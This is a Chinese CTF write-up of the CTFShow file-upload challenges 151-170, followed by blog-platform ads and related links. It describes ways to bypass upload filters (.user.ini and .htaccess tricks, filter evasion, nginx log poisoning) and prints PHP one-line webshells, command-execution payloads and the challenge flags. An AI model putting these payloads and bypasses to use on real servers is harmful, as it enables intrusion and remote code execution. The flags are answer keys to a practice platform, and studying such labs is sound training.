CTFShow-WEB入门篇文件上传详细Wp(151-170)

本文涉及的产品
全局流量管理 GTM,标准版 1个月
云解析 DNS,旗舰版 1个月
公共DNS(含HTTPDNS解析),每月1000万次HTTP解析
简介: CTFShow-WEB入门篇文件上传详细Wp(151-170)

CTFShow 平台:https://ctf.show/

文件上传:

Web151:

考点:前端绕过


F12修改源代码 exts后面png改为php 这样就可以上传php的文件了,然后蚁剑直接连接



可以使用插件进行post获取flag。

ctfshow{ec07a689-3422-439f-aeda-25e174588e7e}


Web152:

考点:后端不能单一校验

就是要传图片格式,抓个包传个png的图片 然后bp抓包修改php后缀解析 然后放包 显示上传成功 蚁剑连即可。

ctfshow{3129d70b-491d-411e-811f-b2eafca203c9}


Web153:

考点:后端不能单一校验(黑名单绕过)


.htaccess在绕过文件上传的限制中,通常在 Apache 全局配置文件 httpd.conf 中

有这样一条配置:AddType application/x-httpd-php .php .phtml或者

SetHandler application/x-httpd-php 将所有文件都解析为 php 文件


这里我们尝试.htaccess(因为它只适用于Apache)所以不行,这里要使用.user.ini

php.ini 是 php 的一个全局配置文件,对整个 web 服务起作用;而.user.ini 和.htaccess 一样是目录的配置文件,.user.ini 就是用户自定义的一个 php.ini,通常用这个文件来构造后门和隐藏后门。


这里先上传一个内容为:auto_prepend_file=1.png得png,然后在正常传一个带图片得一句话木马即可。这里如果不懂可以参考:.htaccess 和.user.ini 配置文件妙用



ctfshow{dcea4490-2c26-45a6-8027-3c19c8467554}

Web154:

考点:php关键字过滤


这里方法和上面一样传一个1.png(带一句话木马的文件)然后在上传.user.ini 文件即可

<?=eval($_POST[a]);?>## <?=相当于<?php echo



9da81c1a201e4427bbe43825ba13ba26.png


71b1e19320db4e75a4684a16e3a0dfa6.png

00d72ae9ab7f4fe58ac22388b48827cd.png






00d72ae9ab7f4fe58ac22388b48827cd.png



8f725b6b01164cd7be268d6056073a8f.png


ctfshow{503e93c8-c013-4509-9551-5431a3b5a5ef}

Web155:


这里的方法和上一题一样,ok在做一遍 老样子先上传.user.ini.png1.png然后直接访问/upload/index.php/即可。

ctfshow{25d0b333-d5f2-4761-85a0-bed828314b6d}


Web156:

考点:过滤字符[][]可以可以使用{}代替。

这里也很简单 段标签的基础上改成{}即可 <?=eval($_POST{a});?


这里还有个小技巧如果知道flag的位置可以直接使用system()函数执行 查询即可 <?=system("tac ../f*");?>



ctfshow{dec5a89b-b30b-49fd-94f3-c4c739292799}

Web157:

考点:过滤字符串 过滤了{};


这里可以使用命令执行:<?=system("tac ../f*");?>直接访问/upload/

ctfshow{f7322ad8-f548-4abd-a17b-2e950fa9de2b}



Web158:

同上 一样的方法即可。

ctfshow{ee9f76b3-2182-4276-904f-5bfaf2afcb8f}


Web159:

这里就不能使用那种上面的方法啦,因为过滤了括号,这里显示上传报错的信息。


这里使用 `` 反引号过滤绕过即可:

<?=`tac ../f*`?>
• 1






ctfshow{f84bd0d7-6f86-4de2-bdc9-b51664a4d61c}

Web160:

考点:还是过滤字符串 这里又过滤了log 字符串 所以使用拼接绕过


可以尝试 日志包含绕过 : <?=include"/var/lo"."g/nginx/access.lo"."g"?>


还是先上传.user.ini.png进行解析 然后包含/upload/index.php/ 然后服务器是nginx


知识点:nginx的默认日志路径是:/var/log/nginx/access.log

0f1736a15ace46a7adad275202f5fc46.png


直接查看源代码不然太多了日志看不出

ctfshow{8fcd0b60-1cfc-4045-b07f-9b36580c8f4f}


Web161:

考点:文件头的校验

文件头校验扩展(这里用gif


.JPEG;.JPE;.JPG,”JPGGraphic File”

.gif,”GIF 89A”

.zip,”Zip Compressed”

.doc;.xls;.xlt;.ppt;.apr,”MS Compound Document v1 or Lotus Approach

  1. APRfile”



使用16进制编辑器在.user.ini.png 中添加png 文件头 89 50 4E 47 0D 0A 1A 0A 1.png也添加也会成功!!


访问index.php修改User-Agent为:<?php eval($_POST[a]);?> 然后hackbar 或者蚁🗡连接!



751076deccfe4dd291820e7ba034ab52.png

tfshow{9504ed8b-aebc-4ec0-8f91-45560fc9dc4e}

Web162:

考点:前端校验



Web167:

考点:.htaccess

这回服务器是Aapache2 所以使用.htaccess 写入:AddType application/x-httpd-php.jpg.jpg后缀的文件解析 php



Web169:

考点:前端校验,日志包含

前端做了校验只能传zip文件,后端又做了图片文件检查.过滤了<>php

先上传一个png 发现不符合 看来是过滤了 修改后缀为zip 发现可以 然后抓包 把类型改为image/png

先上传一个index.php,然后利用日志包含,上传.user.ini 写入以下内容进行包含然后UA里面写木马

auto_append_file="/var/log/nginx/access.log"
<?php @eval($_POST['a']);?> #User-Agent


f14d4a32c64c4556ab0e3638112a1f2a.png


ctfshow{6c50c591-4ba3-4624-b86e-de790d47fd4a}

Web170:

考点:前端验证,日志包含

先上传一个png 发现不符合 看来是过滤了 修改后缀为zip 发现可以 然后抓包 把类型改为image/png


先上传一个index.php,然后利用日志包含,上传.user.ini 写入以下内容进行包含然后UA里面写木马

auto_append_file="/var/log/nginx/access.log"
<?php @eval($_POST['a']);?> #User-Agent


6765caca5bce4b1ba73a133d360511f4.png

aef0e73482e748ac887e917c98d0334d.png


d30ba91e4f6d4a9a8428512d2019e7c0.png



ctfshow{b563362f-15b8-4937-9571-ebc3e4a1df35}

相关实践学习
日志服务之使用Nginx模式采集日志
本文介绍如何通过日志服务控制台创建Nginx模式的Logtail配置快速采集Nginx日志并进行多维度分析。
相关文章
|
19天前
|
Java 开发者 微服务
Spring Boot 入门:简化 Java Web 开发的强大工具
Spring Boot 是一个开源的 Java 基础框架,用于创建独立、生产级别的基于Spring框架的应用程序。它旨在简化Spring应用的初始搭建以及开发过程。
38 6
Spring Boot 入门:简化 Java Web 开发的强大工具
|
3天前
|
安全 程序员 PHP
实验室信创平台上几道经典的web-php有关的题目wp
本内容介绍了多个CTF题目及其解题思路,涵盖正则表达式、PHP函数、代码审计等方面。例如,通过POST提交和正则匹配获取flag,利用PHP的松散比较和数组特性绕过验证,以及通过恢复VIM临时文件和SVN隐藏文件夹获取关键信息。每个题目都提供了详细的解题步骤和相关链接,适合初学者学习和实践。
13 1
|
2月前
|
前端开发 JavaScript 开发者
探索现代Web前端技术:React框架入门
【10月更文挑战第9天】 探索现代Web前端技术:React框架入门
|
2月前
|
网络协议 安全 JavaScript
Web实时通信的学习之旅:WebSocket入门指南及示例演示
Web实时通信的学习之旅:WebSocket入门指南及示例演示
216 0
|
3月前
|
前端开发 开发者 Python
从零到一:Python Web框架中的模板引擎入门与进阶
在Web开发的广阔世界里,模板引擎是连接后端逻辑与前端展示的重要桥梁。对于Python Web开发者而言,掌握模板引擎的使用是从零到一构建动态网站或应用不可或缺的一步。本文将带你从基础入门到进阶应用,深入了解Python Web框架中的模板引擎。
44 3
|
2月前
|
Web App开发 Java 测试技术
一、自动化:web自动化。Selenium 入门指南:从安装到实践
一、自动化:web自动化。Selenium 入门指南:从安装到实践
55 0
|
3月前
|
开发框架 安全 .NET
Web安全-文件上传漏洞与WAF绕过
Web安全-文件上传漏洞与WAF绕过
205 4
|
3月前
|
前端开发
|
3月前
|
弹性计算 前端开发 容器
【前端web入门第六天】02 flex布局
Flex布局是一种现代CSS布局模式,通过给父元素设置`display: flex`,其子元素可自动挤压或拉伸。它包含弹性容器和弹性盒子,主轴默认为水平方向,侧轴为垂直方向。主轴对齐方式由`justify-content`属性控制,侧轴对齐方式包括`align-items`(针对所有子元素)和`align-self`(针对单个子元素)。修改主轴方向使用`flex-direction`属性,`flex`属性用于控制子元素在主轴上的伸缩比例。此外,`flex-wrap`属性允许子元素换行,而`align-content`属性则定义多行对齐方式。
|
3月前
|
SQL 安全 数据库
从入门到精通:Python Web安全守护指南,SQL注入、XSS、CSRF全防御!
【9月更文挑战第13天】在开发Python Web应用时,安全性至关重要。本文通过问答形式,详细介绍如何防范SQL注入、XSS及CSRF等常见威胁。通过使用参数化查询、HTML转义和CSRF令牌等技术,确保应用安全。附带示例代码,帮助读者从入门到精通Python Web安全。
95 6
下一篇
DataWorks